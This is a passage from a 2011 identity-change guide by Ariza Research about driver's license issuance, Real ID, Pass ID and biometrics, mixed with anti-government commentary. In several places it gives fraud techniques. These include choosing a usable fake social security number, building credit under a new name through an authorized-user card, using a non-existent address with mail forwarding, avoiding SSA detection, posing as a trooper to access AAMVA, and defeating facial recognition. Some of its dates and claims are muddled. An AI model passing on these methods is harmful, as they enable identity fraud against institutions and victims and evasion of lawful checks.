Ariza Research, All rights reserved - ABP - 15 - +Reproduction in any form is prohibited without written permission. + +Centralized Issuance +As of this writing 15 states have gone to a centralized issuance +system in which the driver’s licenses are issued in one central +location in each state. +You go and apply for your license, if your application is approved +you’re given a paper temporary driving permit that’s usually only +valid for one month. A week or two later you receive your new +license in the mail. +The states like this system for several reasons: +- It streamlines the application process making it quicker +and less demanding on the employees of your local DMV +office. They only have to take and approve your application +without having to bother with the actual production of the +license. +- The state knows you’re providing an accurate home +address because your license will be mailed to that +address. It’s a sort of built-in address verification. In the +past they had no way of knowing where you lived, they +were forced to take your word for it. As a result driver’s +license addresses are often inaccurate. +- Because the production of new licenses is centralized in +a single location, it can be made much more physically +secure. The facility can be located in a locked-down +building built like a fort. Applicants can’t watch as the +license in being made. +They can’t see the make and model of the printer being +used. Also, under this approach applicants don’t have any +personal contact with production personnel. In the past +there were numerous incidences where DMV personnel +were bribed to produce unauthorized licenses. +- It gives the state much more time to verify the information +you provided on your application. If they detect bad +information they can decline to send out your license. +Anti-Forgery Measures +Many states have resorted to using a new vertical format license +for those under age 21. The normal over 21 license is a horizontal +version but the underage license is radically different in that the +whole organization is vertical making it virtually impossible to alter +to the over 21 version. (Many college students routinely attempt to +© Copyright 2011, Ariza Research, All rights reserved - ABP - 16 - +Reproduction in any form is prohibited without written permission. + +alter the birth date on their licenses so they can gain entrance to +bars and clubs where alcohol is being served.) +The states are constantly seeking new ways to produce licenses +that can’t be reproduced using off-the-shelf commercial printing +equipment. +One ploy is to use ever smaller print. The new generation of +licenses will employ tiny little print barely readable to the naked +eye. When scanned these tiny letters dissolve into mushy little +dots. The same thing applies to tiny super fine lines thinner than a +human hair. Once again scanners and copiers can’t properly +reproduce such fine detail accurately. +Some states are experimenting with using lasers to burn the +printing into the surface of the license making alteration all but +impossible. +Pass ID +Under Real ID your birth certificate had to be properly verified with +the issuing agency or it couldn’t be accepted. Under the new Pass +ID there is no such requirement. The only standard is that the +DMV “make a reasonable effort” to assure that ID documents are +in fact genuine. +The old Real ID requirement that your driver’s license had to be +fully compliant with all the requirements of Real ID before you +could board an aircraft in the U.S. has been scrapped under Pass +ID. Now the Pass ID will be the only ID accepted for “federal +purposes” meaning you can’t apply for any kind of federal benefits +without a fully complaint DL. +The Real ID act required that the biometric code imbedded in the +license had to be of a type that consumers had no way of reading. +In effect that meant an RFID chip. +Under Pass ID the old standby – the bar code – has replaced the +dreaded and hated RFID chip. Homeland Security is now advising +states to use bar codes. +If you’re really interested in the details of drivers license issuing +you can easily log onto the site of the American Association of +Motor Vehicle Administrators (AAMVA). The log on procedure is +simple enough. Just list yourself as a “trooper” and you’re in. +There’s a ton of super-detailed information in their site. +(www.aamva.org) These nice folks even have a course (in pdf +format) on how to recognize fraudulent ID documents! +© Copyright 2011, Ariza Research, All rights reserved - ABP - 17 - +Reproduction in any form is prohibited without written permission. + +Real ID has the goal of having all the licenses of those under age +50 in full compliance by 2014 and those under age 50 by 2017. +Under Real ID there was identity verification but under Pass ID +there will be only identity validation. ID documents will be +accepted as they always have – at face value. +The new Pass ID law contains language that prohibits it’s +provisions from applying to anyone in any state that has a state +law prohibiting that provision. In other words the states are still +free to modify the DL application procedure as they see fit. +For example, in California there is a new law allowing the issuing +of special drivers licenses to illegal aliens. Under Real ID no one +could obtain a DL without proving they are in the U.S. legally. +Should their visa expire – their license would also expire making it +more difficult for them to remain here illegally. +Real ID required that states share their applicant databases. That +provision has not been included in the Pass ID approach. An +individual will still be able to obtain multiple DLs in different states +(except for those who have had a court terminate their driving +privileges). +Maine was all set to ban the Real ID act from their state but when +the Governor was advised that criminals, bad drivers, drunks and +other undesirables were flocking to their fine state in order to get +their more easily obtainable drivers licenses, he relented and +vetoed the Real ID ban. +The vital records of the following states are digitizing their birth +certificate records: +California +Colorado +Hawaii +Iowa +Minnesota +Mississippi +Missouri +Oklahoma +In addition the social security office in 26 states can now verify +birth certificates via digital means. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 18 - +Reproduction in any form is prohibited without written permission. + +Facial Recognition +Some states are using facial recognition software to help them +avoid having one person obtain two DLs in two different names. +Right now these searches are being conducted only within the +same state. +Ask if you can smile when they take your picture for your DL. +Some states will allow smiles while others won’t. This ban on +smiling is being used to avoid problems with the facial recognition +software. Smiling confuses the software making it less likely (but +by no means impossible) to make a match. You with a smile and +you without a smile seem to the software to be two very different +people. +In Nevada in 2009 they cancelled 136 licenses of people who +facial recognition software had identified as having duplicate +licenses. +You can understand why states would want to use such software. +Imagine how devastating it might be for you if I had a similar +appearing face and managed to obtain a DL in your name. +I could stroll into your bank and withdraw money from your +account. I could commit crimes and when caught hand the cops +“your” DL. There’s no end to the damage I could do to your whole +life – all I would need is that DL. +Real ID – Pass ID Comparison +Under Real ID you had to provide your full name including any +middle name and nicknames. Under Pass ID this requirement has +been dropped. +Under Real ID the application form included a statement that the +information provided is true and correct and being provided “under +penalty of perjury”. This is an intimidation tactic that’s really quite +effect. +Under Pass ID this provision has also been dropped. +Under Real ID the maximum license validity was five years. Now +under Pass ID states can, as an option, provide an eight year +validation. +Real ID required that facial photographs be stored in a database +that’s searchable by other state DMVs and also law enforcement. +Under Pass ID this provision has been abandoned (at least for +now). +© Copyright 2011, Ariza Research, All rights reserved - ABP - 19 - +Reproduction in any form is prohibited without written permission. + +Under Real ID DMV employees would have had to undergo +background checks. Those with criminal records would be fired or +denied employment. Under Pass ID there is no requirement for +background checks. +Under Real ID DMV employees would have been required to +undergo formal fraudulent identity document training and access +to the DL production equipment would have been limited. Under +Pass ID these provisions have been abandoned. +Warning: Never attempt to board an aircraft in the U.S. with a +driver’s license that is in any way improper. If you are arrested for +attempting to board an aircraft in the U.S. using a fraudulently +obtained DL, your name will most likely be placed on the aviation +“no fly” list which will bar you from flying in the U.S. in the future. +Which Documents Prove What? +Under Pass ID here are the ID documents and what they’re +accepted for: +Birth Certificate proves legal name, date of birth and legal +presence (you’re an American citizen). +U.S. Passport proves legal name, date of birth, signature, legal +presence and photo. +Social Security Card proves signature and social security number +Court Ordered Name Change proves only your legal name. +Marriage Certificate proves legal name and signature (but only if +government issued) +Vehicle Registration proves your address. +Paycheck Stub proves your address. +Cancelled Check proves your address. +Mortgage Document proves your address. +Enactment of the Real ID law has been delayed for the third time. +This law which has been attacked by so many groups including +the ACLU, the Heritage Foundation and over 30 states and over a +hundred cities seems to be dying a slow death. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 20 - +Reproduction in any form is prohibited without written permission. + +The act which called for drivers license bureaus to perform online +verifications of all identity documents individuals presented was +entirely unrealistic. +There is no way that the states are going to be able to afford to +create such a massive high-tech system. The technology simply +isn’t available and now with the whole economy in a tailspin and +over 30 states now bankrupt there clearly isn’t the funding +required. +Also the original Real ID act called for the creation of a vast +database into which images of all identity documents presented +would be created and maintained so that other government and +private entities could perform searches. This aspect of the act +presents an intrusion by government into our lives that many +found contrary to the whole notion of a free country. +Barack Obama seemed to be openly critical of the Real ID act so +it was assumed that his administration would bury the law and +keep it from ever being enacted. +But we were wrong. The Obama administration is now seeking to +replace Real ID with Pass ID a watered down compromise version +of the original act. +Under Pass ID the need to verify ID documents will be scraped as +least for the next few years. Congress has been quietly increasing +the distribution of funds to the states for the purpose of increasing +drivers license security. +Also, the idea of a vast national database containing ID +documents of each and every citizen has been tossed. +But that leaves the incredibly sensitive issue of illegal aliens. +Some of these people are in fact terrorists and millions of others +have no right to be in this country. Though the feds want the +issuance of drivers licenses to illegal aliens banned, California is +now issuing special licenses to those who lack the correct visas. +Will Pass ID be passed into law and fully enacted? No one knows +but with the White House and the Secretary of Homeland Security +behind it, it might become a reality. +What does all this mean to those of us interested in identity +change? It means we’ve dodged the bullet – at least for now. +Someday we will no doubt end up with the kind of system the Real +ID act tried to impose. According to the Real ID extension +announced in December 2009, the deadline for full compliance for +Real ID has been extended until at least May of 2011. The ACLU +© Copyright 2011, Ariza Research, All rights reserved - ABP - 21 - +Reproduction in any form is prohibited without written permission. + +says this delay is yet another sign that the whole act is for all +practical purposes dead and buried. +The Obama administration is now using the threat of Real ID to +help them push their Pass ID act enacted, there will be some +changes to drivers license processing but nothing like the +draconian measured Real ID would have inflicted. +If there’s another terrorist attack you can expect that the entire +Real ID program will be enacted with haste. Other than that either +the Real ID program will be delayed over and over until it’s +forgotten or the Pass ID program will be enacted in it’s place. +You can still create a new identity these days. It’s getting a bit +more complicated but not that much so. Until online document +verification becomes a reality we’re still in business. +In 2009 the most important factor in the world of identity changing +will be the enactment of the new Real ID law signed into law by +President Bush. +The Bush administration was eagerly pushing the enactment of +Real ID but when the public became aware of the details of this +new law, the government was forced to delay the law’s schedule +and even drop many of it’s more offensive requirements. +At this point it appears that Real ID is doomed - but you never +know. Either the government will officially abandon the law which +looks likely, or the law will finally be enacted. If it becomes law, it +will become more difficult (but not impossible) to change your +identity. +Under this new law every American will be required to prove their +identity to the government’s satisfaction. This will involve long +lines, hefty new fees and a great deal of bureaucratic paper- +shuffling. If your parents didn’t bother to file a birth certificate when +you were born – you will be in a mess. +If you can prove your identity, (along with your right to be in the +U.S.) you’ll qualify to receive the new Real ID drivers’ license. +Under the new federal requirements your fingerprints and digital +photo will be permanently stored both on the license and also in a +nationwide database that government officials will be able to +search at their pleasure. The license itself will include several +different forms of biological or “biometric” tracking devices, +probably a fingerprint and an eye (retinal) scan. The data will be +encoded in an enciphered RFID chip. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 22 - +Reproduction in any form is prohibited without written permission. + +This will provide the government with an online way to verify an +individual’s identity instantly. Not only that – the government can +then easily track our every move and our every financial +transaction. (Have you ever been warned about the biblical “mark +of the beast”?) +Widespread resistance to Real ID has forced the government to +back off and delay implementation and relax some of the stricter +standards. Fear of the new drivers license becoming a defacto +national ID has fueled resistance in many areas. +In effect, the government will be creating personal dossiers on +private citizens, something that was clearly illegal and +unconstitutional until the Real ID act became law. +Will this system make us more or less secure? Imagine how easy +such a data source will make identity theft. All the personal +information the thief needs will be right there in a single resource. +Of course there will be security measures in place but as we’ve +seen in the past even the most clever protections can be +penetrated by a talented 15 year old. +Will this incredibly intrusive act become law and crush our +personal freedom and our what little remains of our privacy? No +one knows. +Even the Department of Homeland Security itself has voiced +reservations about Real ID’s privacy, logistical and security +issues. +While the Bush/Cheney administration eagerly embraced Real ID, +the new Obama administration is a horse of a very different color. +While no one is sure exactly how Barack Obama feels about Real +ID, he did appoint Arizona Governor, Janet Napolitano as the new +Secretary of Homeland Security. Back in June 2008 she signed a +bill that bars her state from cooperating with the Real ID act +should it ever be enacted. +According to a recent speech the governor estimated that the +states would have to spend $11 billion to bring them into full +compliance with the act which was far too much given the fragile +condition of state finances these days. +From her appointment it would appear that the new administration +isn’t as enthusiastic about Real ID as the outgoing Bush gang. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 23 - +Reproduction in any form is prohibited without written permission. + +Another factor are the various state’s reactions to Real ID. A total +of 21 states have passed laws or resolutions condemning Real ID +and prohibiting the states from funding the incredibly expensive, +super high-tech data systems the act requires. +Arkansas, Idaho, Maine, Montana, New Hampshire, South +Carolina and Washington have declined to participate in Real ID. +This list may expand in the months ahead. +It would appear that the Real ID is destined for the dustbin of +history but unfortunately there’s a wild card to be considered. +Another terrorist attack on the scale of 9/11 could trigger a +widespread panic that would give the government a green light to +go full speed ahead on Real ID. Any dissent from civil liberties +types would either be ignored or severely punished. +The terrorists attacked Spain blowing up several crowded trains +the day before their national election. The explosion had an effect +on the election’s outcome. I fear that the terrorists may have the +same sort of timing in mid for their next attack on the U.S. +Perhaps just before the upcoming 2010 election, or before the +next presidential election in 2012. +My best guess is that the Obama administration will either cancel +Real ID or at least delay it’s enactment for another several years +or longer. I doubt the January 1, 2010 activation date will come to +pass. +Bottom Line: Now is the time to obtain a new identity. DON’T +WAIT! A terrorist attack could come at any time and Real ID could +be activated literally in a few days. +Real ID +The law creates a series of new federal requirements for the +issuance of new or replacement drivers licenses. In effect it would +convert the old state-designed drivers license into a national ID +that meets federal standards. +The law does two things. It lays out the exact standards that state +issued drivers license must meet in order to qualify +After a five year introductory period the new federal ID would be +required to open a new bank account, board a scheduled airline +flight, apply for any kind of government benefit or even enter any +kind of federal building. Clearly life without one of these cards +would be quite difficult. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 24 - +Reproduction in any form is prohibited without written permission. + +How It Works +Instead of renewing your drivers license through the mail or in the +usual facility run by those nice kind old ladies, you will be required +travel to a larger regional center where you will be required to +prove your identity to the government’s new standards. +You will be required to produce government-issued ID documents +such as your birth certificate and/or passport. Only government +issued documents that can be electronically verified with the +issuing authority will be accepted. +Your picture will be taken and a digital picture file will become a +permanent part of your new federal dossier along with your birth +date and your signature. +In addition your biometric information will be acquired and +recorded. This will probably include an eye scan or palm scan and +a fingerprint. +Any documents you provide will be scanned and the images will +be recorded in a new database indexed by your name, birth date, +home address, social security number and possibly a fingerprint +number. +This document database will be entirely searchable by any and all +government agencies and, of course, law enforcement. Any other +information Uncle Sam may have on you (your criminal record, +your military record, any negative information they may have on +record) will be attached to your file for future reference. +Does any of this make you nervous? Can you smell the foul +stench of totalitarian repression? +The goal here is a dual one. The government will force you into +proving: +1. That you are who you say you are. +2. That you are a legal citizen who is living legally in the U.S. +Of course, if you are a wanted criminal with outstanding warrants +in NCIC you can expect to be arrested during the Real ID +application process. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 25 - +Reproduction in any form is prohibited without written permission. + +The New ID Standard +Each new federally-approved license will include a number of +security devices that were carefully engineered to make +counterfeiting much more difficult. The magnetic strip will include +personal information but that data will be encrypted using a +sophisticated algorithm known only to federal officials. +The card will also include two sets of data. One will link the holder +to the card using two biometric numbers, one that encodes your +eye scan data and the second will (probably) be the data from +your fingerprint. +This will link your physical body to the card making card switching +impossible. +Then a second set of data will be the key to your federal data file +containing your personal documents and related information. In +this way the card can be linked to you and the card can be +scanned through a reader that gives the scanner full access to +your federal file. +To President Bush all this sounds really nifty. Problem is – +resistance to this whole program is fierce. 21 cities have sworn to +resist Real ID as have a half dozen states. Numerous attempts +have been made to crush the law before it’s fully enacted. +Groups on both the left and right are combating Real ID. The +leftist ACLU is spending a small fortune on a nation-wide publicity +program against the law. And on the right Dick Armey and the +Heritage Foundation are doing the very same thing. The governor +of Montana has been particularly strident in his opposition. +Imagine how such a card could be used. The government could +use it to track our every move, our every financial transaction. And +I thought this was a free country! +The Problems +There are many problems with Real ID. First is the simple fact that +the computerized systems required to verify ID documents on a +real time basis doesn’t exist and won’t for at least another decade. +Most of the Vital Record offices where birth certificates are stored +aren’t in any way automated. In fact, most are dusty little holes in +the wall where elderly ladies look up enquires by searching +through huge drawers of rotting papers. Will these little ladies be +able to keep up with all the new verifications required to support +the Real ID systems? I doubt it. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 26 - +Reproduction in any form is prohibited without written permission. + +And if we want to automate them and bring them into the 21st +century, the financial cost will be tremendous. When President +Bush signed the Real ID bill into law did he send out the billions +needed to build the system. No he didn’t This is yet another +example of a federal unfunded liability. +Some limited funding has entered the pipeline but it’s only a nickel +on the dollar and many states are fighting Real ID for this reason +alone. State budgets are already in deficit. Experts have predicted +that if fully enacted Real ID will cost a whopping 11 billion – +money the states simply don’t have. +And exactly how will this new license be used? If a cop stopped +you will you be required to produce your Real ID license? If you +don’t have it will you be thrown in jail? This harkens back to a +black age when the words “where are your papers – you must +have your papers” were a hallmark of the Nazi age. +Will we be required to produce the license along with our credit +card in order to make credit card purchases? This will help make +credit card fraud more difficult but it will also allow the feds to +monitor our every financial transaction. How will that information +be used? How much do you trust the federal government? +The Current Situation +The Real ID program was to be introduced over a five year period +beginning May 11, 2008 and supposedly ending in May of 2013. +But fortunately the government’s plans have failed. +Because of a lack of funding along with a lack of the computer +systems required and because of the political pressure against it, +the whole program has been shifted to the back burner. +Some months ago the Homeland Security agency announced that +it would entertain requests for extensions from states. Over 40 +states have requested and obtained extensions. As of this writing +Maine is still squabbling with the government and has not yet +received an extension though I expect one will be issued. +As usual, the government has tried to use spin to turn it’s failure +into a victory. Instead of announcing the extensions as a failure, +they’ve triumphantly announced that though the Real ID system +wasn’t initiated as planned, most of the states have introduced +most of the new security features to their drivers licenses so the +whole thing is a great victory! +© Copyright 2011, Ariza Research, All rights reserved - ABP - 27 - +Reproduction in any form is prohibited without written permission. + +Resistance to the Real ID program is still fierce. Many of the new +security standards have been abandoned and compromises have +been made in an attempt to make the new standards more +palatable to the states. +Problem is – the government is very tricky. Way back in the early +1960s when people were concerned with being numbered under +the social security system. To get around this resistance the feds +issued a new rule which they promoted widely. Under the new rule +your social security number could NEVER be used for +identification purposes. Most of the early social security cards +actually had this phrase emblazoned across it in an effort to quell +the growing resistance. +Then when the government was certain that most Americans were +federally numbered – they changed the rule and now the SSN is +the standard means of identifying individuals. +Real ID Privacy Issues +Once the Real ID system has accumulated the 245 million records +of drivers license holders, how secure will the database of ID +documents be? Of course the government predicts that all will be +protected by iron-clad security measures. +But given past government security mistakes, it will only be a +matter of time before some hacker will penetrate their security +system and grab our most personal records. +Just think of it – here will be a database that contains not only +your birth certificate with your birth date and all the details +surrounding your birth, but it will also contain your social security +number, your verified and confirmed home address and a host of +other government acquired information. +This database would be a virtual treasure trove of information for +an identity thief. It contains everything they need to steal your +identity and use it to fraudulently obtain credit cards or even +purchase vehicles in your name using your credit. +Such a high-value source of information would be under near +constant hacker attack. +But there’s more. Who exactly will have access to this new +collection of dossiers? Will private businesses have access? +Perhaps the corporate sponsors who have supported the +president and his party will be given free access for marketing +purposes. Information of this sort would be potentially worth +billions. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 28 - +Reproduction in any form is prohibited without written permission. + +Washington insiders would find it very difficult to resist the +temptation to peddle the data to any and all comers willing to pay +the price they set. +Will every city, county, state and federal employee have full +access to your personal file? Will any copy on the beat be able to +view your entire life on his laptop? +Plans include having your Real ID file communicate with all the +other hundred or more personal files big brother is maintaining on +you. This kind of accumulated information could form the core of a +whole new way of life for Americans. +Some are calling it the dawn of the “big brother society” where +100% surveillance will be the norm. We would all live in a glass +fishbowl where we would live out our lives under the constant +gaze of government snoops. +Can we trust the government with so much personal information? I +don’t think so. Some years ago the FBI instituted a new +investigation procedure for those who purchased guns. +When you initiated your gun purchase the FBI would open an +investigation to be sure you were legally able to complete the +purchase. Under the law that information was to be maintained in +an FBI database for no more than 30 days. After that, the law +required that the information, in the interest of protecting personal +privacy, would have to be destroyed. +Did the FBI comply with this particular requirement? Of course +they didn’t. Instead, the FBI committed a federal felony and +decided that this data should be maintained in fully searchable +databases for the use of law enforcement. (Those who worry +about their second amendment rights believe that their intention is +to build a database of gun owners in preparation for the eventual +confiscation of private firearms.) +The Real ID system would deeply compromise our privacy while +providing little if any real protection. Given their sad history, you +can rely on government to abuse all this information in ways that +will expand the government’s control of it’s citizenry. +Would your Real ID license be eventually required to vote? Would +it be requir3ed to claim medical services under Medicare or +Medicaid? Would your card be scanned just for entering a national +park or a library? +© Copyright 2011, Ariza Research, All rights reserved - ABP - 29 - +Reproduction in any form is prohibited without written permission. + +The Financial Cost +Experts predict that the total cost of creating the entire Real ID +system could surpass $23 billion. The feds have so far coughed +up only a scant $50 million. When the congress voted on providing +an additional $300 million, the bill went down in flames so it looks +like sufficient funding will not materialize any time soon. +The administrative burden would be enormous. As of now the +Real ID system is scheduled to be initiated on Jan 1, 2010. at first +only those aged 40 or so or under would receive priority. Their +participation would be completed on or before 2013 while the +older participants would follow with 2018 as their final deadline. +But don’t hold your breath. The electronic infrastructure required +to meet the federal guidelines will probably take many more years +given the paltry level of federal funding. +Biometric Follies +Those who are in the know will tell you that biometrics is not the +exact science many people think it to be. Biometric indicators can +become confused and provide false information that will, +unfortunately, be regarded as gospel despite it’s technological +shortcomings. +Real ID on the Rocks +Homeland Security while maintaining that the program is going +forward, have lately been backing off earlier more strict +requirements. For instance, their initial requirement called for +these new licenses to be made of polycarbonates and be +engraved with laser printing in an attempt to make it difficult to +create fake documents. +Recently the government backed off this requirement and has +happily embraced steps taken by various states to help make their +licenses more tamper resistant despite the fact they don’t meet +the earlier federal standards. +A total of 38 states have passed legislation opposing the Real ID +law. Over 600 other organizations have gone on record opposing +this burdensome new law including the National Association of +Governors. +For more on the Real ID system you can visit the ACLU’s anti- +Real ID site at: www.realnightmare.org. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 30 - +Reproduction in any form is prohibited without written permission. + +License bureaus have no way to quickly and accurately determine +the validity of foreign passports and immigration documents. They +can’t even accurately verify our own immigration cards and +papers. Many states can’t even verify driver licenses issued by +other states. +And if you apply for your new Real ID license in a state other than +the one in which you were born, you will run into a problem. How +can you get around these and other ID problems? Simple – get a +passport. The U.S. passport is the most influential ID document +you can carry with one exception. While your passport can prove +your citizenship, your age, the existence of your birth certificate +and your name it cannot help you confirm your home address. +Under the Real ID legislation is a note that states that the U.S. +passport meets all the standards of the Real ID requirements +except the address requirement. +All of this paper shuffling will cost you. Forget the old $20 fees and +start thinking about much higher fees that might even surpass the +$100 level especially at first while there is no computerized +infrastructure to provide quick low-cost verifications. +Illegal Aliens +Foreigners who are legally authorized to reside in the U.S. will be +issued licenses but their the expiration date of the license will +match the expiration of their visa. In this way the government can +pressure illegal aliens to leave the country. +What about the 10% of Americans who never had a birth +certificate filed after their birth? What will become of them? What +about criminals or illegal aliens who overstay their visas? This law +will create a permanent new underclass of second class citizens. +Under this new system you can forget the old adage about being +innocent until proven guilty. Under this system you will be a +permanent suspect who will constantly have to prove you’re +innocent – at least during the situation at hand. +If you have a current passport in your possession you will be able +to board planes, enter federal buildings, apply for government +benefits and vote. It’s your way around the Real ID system. +But then perhaps you should also write your congressperson and +senator and demand that they kill the clearly unconstitutional Real +ID law. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 31 - +Reproduction in any form is prohibited without written permission. + +Fingerprints +Many states now require that you provide a fingerprint or a thumb +print as part of your driver’s license application process. In recent +years this practice has spread to more and more states. +But now we’re seeing a backlash. Several states have ongoing +law suits (Georgia and Oklahoma for example) that seek to +eliminate the fingerprint requirement due to it’s privacy +implications. +So once again the situation is confused and chaotic. According to +the best information available at this point (December 2010) only +Ohio, Nebraska, Illinois and possibly Missouri don’t require finger +prints. +This whole thing reminds me of the social security laws of the +1970s. Back then all 50 states suddenly started requiring that +social security numbers appear prominently on their driver’s +licenses. +Within several years most states had completely reversed those +laws, passing new laws that banned the listing of social security +numbers on licenses. +This rapid change was caused by the explosion of identity theft. If +someone were to steal your wallet or purse, they would have all +the information they need to get a credit card in your name or +even buy a car using your name and SSN. +This situation seems similar. The federal government is pushing +for a national fingerprint database that includes all the fingerprints +collected at DMVs in all 50 states. In this way they could prevent +anyone from having more than one identity. +A nice idea but it seems as though Uncle Sam has once again +overreached. Given our fear of big government and our desire to +maintain what little remains of our personal privacy, the creation of +such a database seems unattainable – at least for the near future. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 32 - +Reproduction in any form is prohibited without written permission. + +Most Difficult States to Obtain a Drivers License +Alabama +Arizona +Colorado +District of Columbia +Florida +Georgia +Idaho +Kentucky +Missouri +Nevada +New Hampshire +New York +Pennsylvania +South Dakota +Virginia +Wyoming +© Copyright 2011, Ariza Research, All rights reserved - ABP - 33 - +Reproduction in any form is prohibited without written permission. + +Chapter 1 +Update - Recent ID Developments +The federal government is busy trying to standardize the blizzard +of different birth certificate and drivers license formats. Buried +deep in an intelligence funding bill are some provisions anyone +concerned with privacy and individual liberty should be aware of. +First the feds are working to develop a standard for a fraud- +resistant birth certificate. The details are yet to be determined. +Other federal committees are developing machine readable +encoded data standards for all drivers licenses. After some period +(currently proposed – the end of 2006) the federal government will +no longer accept drivers licenses that don’t meet the new +standard. In the past this requirement didn’t mean much except to +those who would be applying for some sort of federal assistance +like welfare or ADC. +But since you now need an acceptable ID to get on a plane, this +new legislation becomes much more important. While states will +continue to issue drivers licenses, if a state fails to add the +computer readable data to their licenses, their holders won’t be +able to fly or apply for any kind of federal benefits. This places +extreme pressure on the states to comply and comply quickly. +This is one time you don’t want to be left behind. +While the pressure is great, the details on the encoding standard +are still being worked out. They’ll probably want to avoid magnetic +strips as they can be easily changed and also easily erased +(either by mistake or on purpose). +No doubt the information will be encrypted using some very strong +algorithm which will make forging the data very difficult. We’ll have +to wait and see what they come up with. +The new rules forces the states to stop putting social security +numbers on their drivers licenses. This comes as no surprise +given the explosive increase in identity theft (you should never +carry anything in your wallet or purse that lists your social security +number). But the problem now is – what number are they going to +use in the new federal databases? +If we ever get a universal health care program in this country +(Don’t hold your breath!), we will all be issued a health ID card +with a health ID number that will be used to track our medical care +but will at the same time become a new national ID number the +feds will use to track our every move. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 34 - +Reproduction in any form is prohibited without written permission. + +Exactly what data will be included on our new drivers licenses? +How and when will it be updated? How will that data be used? +How will it be used in government databases (the big question)? +The departments of transportation and homeland security will be +calling the shots on these key issues. +The department of health and human services will draft the rules +on the new standardized fraud-resistant birth certificate. +According to recent surveys the public is happy with making ID +documents more fraud-resistant. But when it comes to making +those same licenses machine readable under standards created +by government, public support turns to scorn. +Privacy advocates are howling as they predict these changes will +vaporize what little is left of our personal privacy. They also see +them as part of an ever tightening web of totalitarian control all +done in the name of “preventing terrorism”. +All but one of the 19 terrorists that were involved in the 9/11 attack +had legal drivers licenses. These new birth certificate and driver +license rules wouldn’t have prevented any of them from getting the +drivers licenses they used to board their planes. So why are we +going through all this? Good question. +Fact is, none of these rules will prevent someone from creating an +entirely new identity. It just makes the ID documents themselves +more difficult to forge. +Some privacy and freedom advocates have remarked that these +new rules move us from a state-based ID system into the realm of +a federally-controlled system with a new national ID. +As usual a wide range of organizations are opposing these new +changes. Once again we have some rather strange combinations +of groups at play here. It should come as no great surprise that +the ACLU is involved but did you ever see them partnered with the +“American Conservative Union” and the “Gun Owners of +America”? +© Copyright 2011, Ariza Research, All rights reserved - ABP - 35 - +Reproduction in any form is prohibited without written permission. + +Other Recent Changes +- Banks now have access to a list published by the Social +Security Administration that includes the social security +numbers that have been “retired”. This makes it very +difficult to use such a number to open an interest-bearing +bank account. In order to come up with a temporary usable +social security number you’ll have to be sure it’s not retired +(Check the social security death index – if it’s not listed – +it’s probably safe) AND you’ll have to be sure the middle +two digits are right for the time of issue. The first three +digits must also be the correct ones for the area you claim +to have lived in when you started working. +- The credit bureaus also subscribe to the lists of retired +SSA numbers so if you apply for credit using one of these +numbers, you can expect problems. +- States, counties, cities and the feds are creating +reciprocal data sharing agreements very quickly these +days. Those who are behind in their child support +payments or have outstanding DUIs may find that the law +has lengthened it’s arms. Just because you’re in another +distant state doesn’t mean they can’t find you. +- When a government database contains negative +information on you (whether or not it’s true), the burden of +proof which used to be on the government – they had to +prove you were guilty. Now the tables have been turned. If +the database says you are guilty – you stay guilty until you +can prove that you are innocent. This is the single most +troubling aspect of centralized government databases. +One small mistake can ruin your entire life. And just you try +to correct that data. It will take an act of congress to set +things right! +- If you live in an urban location, it may prove easier to +obtain a new drivers license if you go through the cost and +trouble of taking a driver’s school. They will run you +through some of the paperwork and you will look much +more reasonable, even if you are over age 35 if you live in +a big city where many people use mass transit. +- If you have a very good friend who trusts you entirely, you +can quickly rebuild your credit in your new name by having +them obtain an American Express credit card and then +apply for an additional card under their account but in your +new name and social security number. You get a +prestigious credit card (a very solid piece of ID) without a +lot of questions. Then as you use it you build up a new +credit record under your new social security number. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 36 - +Reproduction in any form is prohibited without written permission. + +You might be able to pull this trick with other bank cards +but policies vary from bank to bank so check things out +before you jump. Also check to be sure they report added +cards to the credit bureaus just like AMEX. +- As the feds move us toward a national ID system, they’ve +thrown a bone to the privacy and freedom advocates by +specifically prohibiting the creation of national standards +for both birth certificates and drivers’ licenses. +- If you attempt to obtain an official copy of a real birth +certificate you may find it more difficult to obtain certified +copies. Some areas are now freely issuing non-certified +copies but restricting the more official certified copies to +those who can prove a legal need. (One lady got an +unofficial uncertified copy and just stamped “certified” on it +in purple ink!) +- The Social Security Administrations “High Group List” is +listed (at this writing) on the SSA’s web site. Use the +search function to find it as the exact page it’s on may +move from time to time. +- The Social Security Admin apparently now verifies only +those birth certificates of those who apply for new numbers +under the age of 17. +- A school ID can come in quite useful these days. Just be +sure you include the following information: the name of the +school, your full name, your age (or birth date), your +student ID number, your year of graduation and your +photo. Of course you can add some other info like +homeroom number or school address. +- I’ve heard that the social security offices in the state +capitals are somewhat easier to deal with than the local +offices. Early summer is the best time as that’s when +teenagers start their new jobs. +- Never mail out more than two or three social security +number applications to the social security office from one +address. They track addresses and will tag yours as +suspicious if they get too much mail from it. +- Recently some colleges have begun to destroy their +archived educational records that are over 15 or 20 years +old. Cuts in federal funding have made this necessary. +- Over 40,000 people have used the social security number +on the fake social security cards that used to come in +wallets sold during the 60s through the 80s. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 37 - +Reproduction in any form is prohibited without written permission. + +Whatever you do don’t use this number – 078-05-1120 +unless you want some immediate attention. +- You can use a non-existent mailing address such as an +undeveloped lot or some old abandoned building. Just file +a forward order and have your mail forwarded to your mail +drop. In this way you have an untraceable home address +that can’t be easily traced. You’ll have to renew your +forwarding order each year to keep it in effect for over one +year. +- Changed your identity but lost your educational +credentials in the process? This is a common problem but +there is some good news on this front. It’s easier today to +get a new degree than ever before. You can take college +courses online at your own pace. You can take challenge +exams for credit rather than attend time-consuming +classroom classes. You can now get a great deal of credit +for your life experiences. You can also approach a college +professor and ask to take the final exam for credit. Many +instructors will allow such a deal if you can convince them +that you have the background to justify the special +treatment. Sadly you’ll still get stuck paying for the course +but you’ll get your degree much more quickly. Many +colleges have “advanced placement” policies that allow +you to take a series of exams that will accelerate your +educational progress. Independent study is yet another +way you might get course 